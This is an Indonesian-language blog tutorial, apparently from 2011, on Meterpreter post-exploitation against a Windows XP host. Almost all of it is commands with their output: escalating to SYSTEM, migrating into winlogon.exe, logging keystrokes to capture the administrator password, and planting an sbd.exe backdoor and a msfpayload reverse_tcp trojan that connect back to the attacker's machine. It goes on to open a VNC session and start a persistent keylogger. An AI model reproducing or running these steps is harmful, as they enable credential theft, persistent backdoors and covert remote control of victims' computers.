Kali ini, saya akan memberikan beberapa perintah meterpreter yang sering saya gunakan dalam aktivitas exploitasi.
1. Information gathering + Privilege Escalation
a. sysinfo : berfungsi untuk menampilkan informasi dari system yang tereksploitasi.
meterpreter > sysinfo
Computer : ROOT-11E5DB48A8
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
b. pwd : berfungsi untuk menampilkan informasi process work directory.
Output:
meterpreter > pwd
C:\Program Files\Mozilla Firefox
c. getuid : berfungsi untuk menampilkan user id dari system yang tereksploitasi.
Output:
meterpreter > getuid
Server username: ROOT-11E5DB48A8\Administrator
d. getsystem : berfungsi untuk mengangkat hak istimewa (privilege escalation) meterpreter.
meterpreter > getsystem
...got system (via technique 1).
Setelah getsystem dijalankan, maka user id menjadi:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
e. ps : berfungsi untuk menampilkan daftar process yang sedang berjalan pada system yang terksploitasi.
f. migrate : berfungsi untuk memindahkan service meterpreter ke process lain.
meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.
Note: saya berpindah ke process 632 a.k.a winlogon.exe
g.keyscan_start : berfungsi untuk merekam keystroke keyboard sesuai dengan process id meterpreter
meterpreter > keyscan_start
Starting the keystroke sniffer...
Note: keyscan_start dalam tutorial kali ini, saya merekan keystroke keyboard pada process 632 a.k.a winlogon.exe (sesuai dengan step f).
h. keyscan dump : berfungsi untuk menampilkan hasil dari keyscan_start
meterpreter > keyscan_dump
Dumping captured keystrokes...
red-dragon <Return>
Note: saya berhasil mengambil password administrator =)
i. ipconfig : berfungsi untuk menampilkan configurasi IP milik system yang tereksploitasi
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:50:56:28:dc:a0
IP Address : 172.16.60.128
Netmask : 255.255.255.0
2. Perintah UPLOAD
Saya akan mencoba mengupload 2 backdoor ke dalam system. Sehingga saya dapat mengeksploitasi system tanpa perlu repot-repot.
a. upload Secure Back Door a.k.a sbd.exe
meterpreter > upload /pentest/windows-binaries/tools/sbd.exe C://WINDOWS//system32
[*] uploading : /pentest/windows-binaries/tools/sbd.exe -> C://WINDOWS//system32
[*] uploaded : /pentest/windows-binaries/tools/sbd.exe -> C://WINDOWS//system32\sbd.exe
Note: saya mengupload sbd.exe yang berada di direktory /pentest/windows-binaries/tools/sbd.exe ke direktoy C://WINDOWS//system32
Menjalankan Secure Back Door
meterpreter > execute -H -f "C:/WINDOWS/system32/sbd.exe -q -r 10 -k reddragon -e cmd -p 1000 192.168.1.3"
Process 3364 created.
Mengakses Secure Back Door
root@red-dragon:~# wine /pentest/windows-binaries/tools/sbd.exe -l -k reddragon -p 1000
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\TEMP\gDzCKIoJEf>
Note: saya berhasil masuk ke dalam konsol command prompt tanpa metasploit =)
b. Upload Trojan Horse!
Pertama, buat terlebih dahulu trojan horse milik anda.
root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=2000 X > /root/evil-trojan.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.3", "LPORT"=>"2000"}
Note: Saya membuat trojan horse dalam direktori root, dimana victim akan menghubungi 192.168.1.3 a.k.a attacker pada port 2000.
Upload Trojan Horse dengan konsol meterpreter.
meterpreter > upload /root/evil-trojan.exe C://WINDOWS//system32
[*] uploading : /root/evil-trojan.exe -> C://WINDOWS//system32
[*] uploaded : /root/evil-trojan.exe -> C://WINDOWS//system32\evil-trojan.exe
Menjalankan tugas multi handler untuk membuka meterpreter sesi baru.
Dalam konsol metasploit. Masukan perintah berikut:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 2000
LPORT => 2000
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.3:2000
[*] Starting the payload handler...
Mengeksekusi evil-trojan.exe.
Note: kali ini, mengeksekusi evil-trojan.exe tidak bisa dilakukan dengan konsol meterpreter layaknya Secure Backdoor. Kita membutuhkan konsol shell a.k.a command prompt untuk mengeksekusinya. Dan pastikan process directory anda berada pada C:/WINDOWS/system32. Untuk mengecek process work directory, gunakan perintah pwd. Jika anda tidak berada pada pwd C:/WINDOWS/system32, lakukan tahap privilege escalation pada BAB 1 tahap E dan F. Ketika mengeksekusi perintah ps, perhatikan baris path. Dan temukan process yang bersumber dari direktori C:/WINDOWS/system32. Dalam kasus ini, saya melakukan migrate ke process 1072 a.k.a svchost.exe.
Buka command prompt dengan perintah:
meterpreter > shell
Process 136 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Kemudian eksekusi evil-trojan milik kita
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>evil-trojan.exe
evil-trojan.exe
Maka meterpreter sesi baru akan terbuka.
[*] Sending stage (752128 bytes) to 192.168.1.3
exit
[*] Meterpreter session 3 opened (192.168.1.3:2000 -> 192.168.1.3:47571) at 2011-11-27 10:45:25 +0700
3. Remote Desktop
Saya yakin anda mengincar yang satu ini. Langsung saja.
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.3 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\eZeNeVFVL.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.3:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "root-11e5db48a8"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
4. Key-logger V2
Kali ini berbeda dengan keyscan_start di tahap sebelumnya. Key-logger ini merekam setiap keystroke tanpa memandang pwd meteterpreter.
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 2532
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.3_20111127.3406.txt
[*] Recording
Untuk melihat hasil Key-logger, buka file /root/.msf4/logs/scripts/keylogrecorder/192.168.1.3_20111127.3406.txt sesuai dengan output run keylogrecorder.
Mana yang anda suka? =)
created by:
red-dragon
supported by:
Blue Dragon
Loved by:
Yoshephine Handini








No comments:
Post a Comment